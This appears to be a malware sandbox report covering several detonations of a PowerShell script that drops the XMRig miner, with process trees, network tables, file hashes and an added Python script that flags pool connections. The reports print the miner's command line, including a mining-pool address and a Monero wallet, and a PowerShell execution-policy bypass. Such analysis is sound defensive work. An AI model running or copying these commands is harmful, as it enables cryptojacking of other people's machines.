| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 764 wrote to memory of 2220 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 764 wrote to memory of 2220 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/764-0-0x00007FFAF1663000-0x00007FFAF1665000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fknoqrww.eo1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/764-9-0x000002CF23790000-0x000002CF237B2000-memory.dmp
memory/764-10-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
memory/764-11-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
memory/764-12-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
memory/764-14-0x000002CF23C90000-0x000002CF23CA2000-memory.dmp
memory/764-15-0x000002CF23B80000-0x000002CF23B8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2220-46-0x000001A392E30000-0x000001A392E50000-memory.dmp
memory/2220-47-0x000001A392F80000-0x000001A392FA0000-memory.dmp
memory/2220-48-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-49-0x000001A392FA0000-0x000001A392FC0000-memory.dmp
memory/2220-50-0x000001A392FC0000-0x000001A392FE0000-memory.dmp
memory/764-51-0x00007FFAF1660000-0x00007FFAF2122000-memory.dmp
memory/764-53-0x00007FFAF1663000-0x00007FFAF1665000-memory.dmp
memory/2220-52-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-54-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-55-0x000001A392FA0000-0x000001A392FC0000-memory.dmp
memory/2220-56-0x000001A392FC0000-0x000001A392FE0000-memory.dmp
memory/2220-57-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-58-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-59-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-60-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-61-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-62-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-63-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-64-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-65-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-66-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-67-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-68-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-69-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-70-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-71-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-72-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-73-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-74-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-75-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-76-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-77-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-78-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-79-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-80-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-81-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-82-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-83-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-84-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-85-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-86-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-87-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-88-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-89-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-90-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-91-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-92-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-93-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-94-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-95-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-96-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-97-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-98-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-99-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-100-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-101-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-102-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-103-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-104-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-105-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-106-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-107-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-108-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-109-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-110-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-111-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-112-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-113-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-114-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-115-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
memory/2220-116-0x00007FF6E2BB0000-0x00007FF6E37E3000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:57
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2564 wrote to memory of 2156 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2564 wrote to memory of 2156 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4176,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3912 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4364,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=4336 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.64.52.20.in-addr.arpa | udp |
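The Network table above mixes three kinds of traffic: the staging download of the miner archive from GitHub's release-asset CDN (`objects.githubusercontent.com`), the pool contact (`rx.unmineable.com` resolved, then TLS to `161.35.34.195:443`, the host and port given on the `xmrig.exe` command line), and sandbox noise (reverse `in-addr.arpa` lookups, Bing and Edge telemetry). What makes the pattern a miner rather than a stray DNS query is the order: a download from a code-hosting CDN followed by a stratum-port connection to a pool host. The script below is an added example, not part of the sandbox report: it classifies a constructed subset of these rows, suppresses the reverse-lookup noise, and reports whether the staging download preceded the first pool connection. The rows are copied from the table above; the pool and staging domains and the `161.35.34.195` address are taken from this analysis; matching on the parent domain `unmineable.com` (so sibling subdomains also hit) and the labels and verdict strings are this example's own choices.

```python
"""Network triage for the connection records listed above.

Added example, not part of the sandbox report. The rows are a constructed
subset of the Network table (country, destination, domain, protocol); the
pool and staging indicators are taken from this analysis. Labels, verdict
strings and the ordering check are this example's own convention.
"""
from collections import Counter

# Constructed input: rows copied from the Network table above, in table order.
SAMPLE_CONNECTIONS = [
    ("US", "8.8.8.8:53", "github.com", "udp"),
    ("GB", "20.26.156.215:443", "github.com", "tcp"),
    ("US", "185.199.108.133:443", "objects.githubusercontent.com", "tcp"),
    ("US", "8.8.8.8:53", "215.156.26.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "g.bing.com", "udp"),
    ("US", "204.79.197.237:443", "g.bing.com", "tcp"),
    ("US", "8.8.8.8:53", "rx.unmineable.com", "udp"),
    ("GB", "161.35.34.195:443", "rx.unmineable.com", "tcp"),
]

# Pool indicators from the xmrig.exe command line and the Network rows above.
# The parent domain is used so that other unmineable.com subdomains also match.
POOL_DOMAINS = {"unmineable.com"}
POOL_IPS = {"161.35.34.195"}
# Where the dropped archive was fetched from (GitHub release-asset CDN).
STAGING_DOMAINS = {"objects.githubusercontent.com"}


def in_domain(host, suffixes):
    """True if host equals one of the suffixes or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in suffixes)


def classify(row):
    """Label one (country, destination, domain, proto) record."""
    _country, dest, domain, proto = row
    ip, _, port = dest.rpartition(":")
    if domain.endswith(".in-addr.arpa"):
        return "reverse-lookup"                   # sandbox PTR noise, not the sample's doing
    if in_domain(domain, POOL_DOMAINS) or ip in POOL_IPS:
        # A DNS query for the pool is weaker evidence than a TCP session to it.
        return "pool-dns" if proto == "udp" and port == "53" else "pool-connect"
    if in_domain(domain, STAGING_DOMAINS) and proto == "tcp":
        return "staging-download"
    return "other"


def triage(rows):
    """Summarise the session: per-label counts, pool hosts, ordering and verdict."""
    labels = [classify(r) for r in rows]
    first = {}
    for i, lab in enumerate(labels):
        first.setdefault(lab, i)                 # index of the first row with each label
    summary = {
        "counts": dict(Counter(labels)),
        "pool_hosts": sorted({r[2] for r, lab in zip(rows, labels) if lab.startswith("pool")}),
        # Download from the CDN, then connect to the pool: the drop-and-mine sequence.
        "staged_then_mined": ("staging-download" in first and "pool-connect" in first
                              and first["staging-download"] < first["pool-connect"]),
    }
    if "pool-connect" in first:
        summary["verdict"] = "miner"
    elif "pool-dns" in first:
        summary["verdict"] = "suspicious"        # resolved the pool but never connected
    else:
        summary["verdict"] = "clean"
    return summary


if __name__ == "__main__":
    print(triage(SAMPLE_CONNECTIONS))
```

On the rows above this yields a `miner` verdict with `staged_then_mined` true; the reverse lookups and the Bing traffic land in `reverse-lookup` and `other` and do not affect the result. A session that only resolved the pool name would be reported as `suspicious`, which is the right level for a DNS-only sighting.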
Files
memory/2564-0-0x00007FFDD4233000-0x00007FFDD4235000-memory.dmp
memory/2564-1-0x0000022B70E70000-0x0000022B70E92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ztd31wmj.3sb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2564-11-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmp
memory/2564-12-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmp
memory/2564-14-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmp
memory/2564-15-0x0000022B73090000-0x0000022B730A2000-memory.dmp
memory/2564-16-0x0000022B70EC0000-0x0000022B70ECA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2156-47-0x000001590B9C0000-0x000001590B9E0000-memory.dmp
memory/2156-48-0x000001590BA00000-0x000001590BA20000-memory.dmp
memory/2156-49-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-50-0x000001590BA20000-0x000001590BA40000-memory.dmp
memory/2564-51-0x00007FFDD4233000-0x00007FFDD4235000-memory.dmp
memory/2564-52-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmp
memory/2156-53-0x000001590BA40000-0x000001590BA60000-memory.dmp
memory/2156-54-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2564-55-0x00007FFDD4230000-0x00007FFDD4CF1000-memory.dmp
memory/2156-56-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-58-0x000001590BA20000-0x000001590BA40000-memory.dmp
memory/2156-57-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-59-0x000001590BA40000-0x000001590BA60000-memory.dmp
memory/2156-60-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-61-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-62-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-63-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-64-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-65-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-66-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-67-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-68-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-69-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-70-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-71-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-72-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-73-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-74-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-75-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-76-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-77-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-78-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-79-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-80-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-81-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-82-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-83-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-84-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-85-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-86-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-87-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-88-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-89-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-90-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-91-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-92-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-93-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-94-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-95-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-96-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-97-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-98-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-99-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-100-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-101-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-102-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-103-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-104-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-105-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-106-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-107-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-108-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-109-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-110-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-111-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-112-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-113-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-114-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-115-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-116-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-117-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
memory/2156-118-0x00007FF64E500000-0x00007FF64F133000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:24
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1759s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2676 wrote to memory of 2516 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2676 wrote to memory of 2516 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.227.14:443 | | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/2676-3-0x00007FFA5ED73000-0x00007FFA5ED74000-memory.dmp
memory/2676-5-0x000002508E2C0000-0x000002508E2E2000-memory.dmp
memory/2676-8-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
memory/2676-9-0x00000250A6960000-0x00000250A69D6000-memory.dmp
memory/2676-10-0x00007FFA5ED70000-0x00007FFA5F75C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4hlwluwm.prp.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
